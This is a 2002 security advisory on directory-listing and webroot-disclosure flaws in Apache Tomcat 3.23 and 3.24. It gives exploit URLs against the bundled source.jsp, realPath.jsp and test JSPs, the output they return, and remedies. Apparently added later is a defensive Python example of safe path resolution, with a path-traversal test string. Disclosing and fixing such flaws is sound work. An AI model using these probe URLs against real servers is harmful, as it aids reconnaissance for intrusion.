[UNIX] Tomcat Multiple Directory Listing and Webroot Location Vulnerabilities

From: support@securiteam.com
Date: 05/30/02


From: support@securiteam.com
To: list@securiteam.com
Date: Thu, 30 May 2002 07:55:34 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Tomcat Multiple Directory Listing and Webroot Location Vulnerabilities
------------------------------------------------------------------------

SUMMARY

 <http://jakarta.apache.org/tomcat/> Tomcat is the free open source Java
server. Multiple directory listing and web root location disclosure
vulnerabilities have been found in the product, allowing a remote attacker
to reveal sensitive information on the remote host.

DETAILS

Vulnerable systems:
 * Apache Tomcat Java server versions 3.23 and 3.24

source.jsp
Normally source.jsp is used to look at the source code of programs within
the examples directories. A typical request is:
http://webserver:80/examples/jsp/source.jsp?/jsp/num/numguess.jsp

We have found that when source.jsp is given malformed input, a directory
listing is displayed and the location of the web root is sometimes
disclosed.

The vulnerabilities may only work on port 8080 rather than port 80,
dependent on how the webserver has been configured with Tomcat.

Exploits:
A) Requesting the following URL:
http://webserver:80/examples/jsp/source.jsp??

On 3.23 this gives the directory listing and the webroot; 3.24 just gives
a directory listing.

<title>Directory Listing</title>
<base href="file://localhost/"WEBROOT"/webapps/examples/"><h1>
/"WEBROOT"/webapps/examples</h1>
<hr>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32
height=32>
<a href="images">images</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="jsp">jsp</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="META-INF">META-INF</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="servlets">servlets</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="WEB-INF">WEB-INF</a><br>

B) Requesting the following URL:
http://webserver:80/examples/jsp/source.jsp?/jsp/

On 3.23 this gives the directory listing and the webroot; 3.24 just gives
a directory listing of a subdirectory.

<title>Directory Listing</title>
<base href="file://localhost/"WEBROOT"/webapps/examples/jsp/"><h1>
/"WEBROOT"/webapps/examples/jsp</h1>
<hr>
<img align=middle src="doc:/lib/images/ftp/directory.gif" width=32
height=32>
<a href="cal">cal</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="checkbox">checkbox</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="colors">colors</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="dates">dates</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="error">error</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="forward">forward</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="include">include</a><br><img align=middle
src="doc:/lib/images/ftp/file.gif" width=32 height=32>
<a href="index.html">index.html</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="jsptoserv">jsptoserv</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="num">num</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="plugin">plugin</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="security">security</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="sessions">sessions</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="simpletag">simpletag</a><br><img align=middle
src="doc:/lib/images/ftp/directory.gif" width=32 height=32>
<a href="snp">snp</a><br><img align=middle
src="doc:/lib/images/ftp/file.gif" width=32 height=32>
<a href="source.jsp">source.jsp</a><br>

Solution:
Delete the samples directory if it is not needed.
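The listings above come from a source viewer that is handed a path and falls through to whatever that path resolves to, a directory included. The block below is an added example of how such a viewer should resolve its argument; it is not Tomcat's own source.jsp. It builds a throw-away examples/ tree as a constructed fixture and then applies three checks: an empty argument (the "source.jsp??" case) is refused, the resolved path must lie strictly below examples/jsp (which also refuses the bare "/jsp/" directory and anything that escapes the tree), and only a regular .jsp file is ever read. The examples/jsp allow-list and the extension check are design choices of this example.

```python
"""Safe resolution of a source-viewer argument (added example, not Tomcat code)."""
import tempfile
from pathlib import Path


class SourceRequestError(Exception):
    """Raised for any request the viewer refuses to serve."""


def resolve_source_request(webapp_root: str, query: str) -> str:
    """Return the source text named by the raw query string, or raise.

    query is the query string as the advisory shows it: "/jsp/num/numguess.jsp"
    for a normal request, "?" for the malformed "source.jsp??" request and
    "/jsp/" for the subdirectory request.
    """
    root = Path(webapp_root).resolve()
    viewable = root / "jsp"  # assumption: only examples/jsp may be viewed

    wanted = query.strip("?").strip()
    if not wanted:
        # "source.jsp??" reaches the handler with nothing to look up; refuse
        # rather than falling through to the webapp root.
        raise SourceRequestError("empty path")

    candidate = (root / wanted.lstrip("/")).resolve()

    # Containment: the resolved path must be strictly below examples/jsp.
    # This also rules out the directory itself and any path that resolves
    # outside the tree.
    if viewable not in candidate.parents:
        raise SourceRequestError("path is not below examples/jsp")

    # Only regular files are ever read: a directory here is exactly what
    # produced the listings shown above.
    if not candidate.is_file():
        raise SourceRequestError("not a regular file")

    if candidate.suffix != ".jsp":
        raise SourceRequestError("only .jsp sources may be displayed")

    return candidate.read_text()


def build_fixture() -> str:
    """Constructed examples/ tree in a temp dir, mirroring the listing above."""
    root = Path(tempfile.mkdtemp(prefix="examples-"))
    (root / "jsp" / "num").mkdir(parents=True)
    (root / "jsp" / "num" / "numguess.jsp").write_text("<%-- constructed sample --%>\n")
    (root / "WEB-INF").mkdir()
    (root / "WEB-INF" / "web.xml").write_text("<web-app/>\n")
    return str(root)


def check(webapp_root: str, query: str) -> str:
    """Summarise how the resolver treats one query string."""
    try:
        resolve_source_request(webapp_root, query)
        return "served"
    except SourceRequestError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    fixture = build_fixture()
    for q in ("/jsp/num/numguess.jsp", "?", "/jsp/", "/jsp/../WEB-INF/web.xml"):
        print(f"source.jsp?{q:<28} -> {check(fixture, q)}")
```

The order of the checks matters: containment is decided on the resolved path, so a trailing slash, a dot segment or a symlink cannot turn a file check into a directory listing, and the extension check runs last so it never masks a containment failure.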

The /test/realPath.jsp sample:
An example program is provided with Tomcat under the http://webserver/test
directory that gives the location of the webroot.

The test page of "http://webserver/test" displays the following message:
"This is the home page of the test hierarchy. It does not do too much good
to look at it directly... Instead, why don't you run the tests to find out
what you might want to know.

Oh, by the way, merry christmas.. :)"

The vulnerabilities may only work on port 8080 rather than port 80,
dependent on how the webserver has been configured with Tomcat.

A) Requesting the following URL:
http://webserver/test/realPath.jsp

Displays the following:
The virtual path is /test/realPath.jsp

The real path is "WEBROOT"/test/test/realPath.jsp

The real path is "WEBROOT"/test/realPath.jsp

Solution:
Delete the realPath.jsp program.

Example programs:
Tomcat comes with a selection of example programs that display the
location of the webroot without any input when Tomcat is installed with
the default configuration.

The vulnerabilities may only work on port 8080 rather than port 80,
dependent on how the webserver has been configured with Tomcat.

Requesting the following URLs:
http://webserver/test/jsp/buffer1.jsp
http://webserver/test/jsp/buffer2.jsp
http://webserver/test/jsp/buffer3.jsp
http://webserver/test/jsp/buffer4.jsp
http://webserver/test/jsp/comments.jsp
http://webserver/test/jsp/extends1.jsp
http://webserver/test/jsp/extends2.jsp
http://webserver/test/jsp/pageAutoFlush.jsp
http://webserver/test/jsp/pageDouble.jsp
http://webserver/test/jsp/pageExtends.jsp
http://webserver/test/jsp/pageImport2.jsp
http://webserver/test/jsp/pageInfo.jsp
http://webserver/test/jsp/pageInvalid.jsp
http://webserver/test/jsp/pageIsErrorPage.jsp
http://webserver/test/jsp/pageIsThreadSafe.jsp
http://webserver/test/jsp/pageLanguage.jsp
http://webserver/test/jsp/pageSession.jsp
http://webserver/test/jsp/declaration/IntegerOverflow.jsp

Will result in an error being displayed that contains the true path used
in the tested server's configuration.

Solution:
Delete the samples directory if not needed.

ADDITIONAL INFORMATION

The information has been provided by
<mailto:richard.brain@procheckup.com> Richard Brain.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
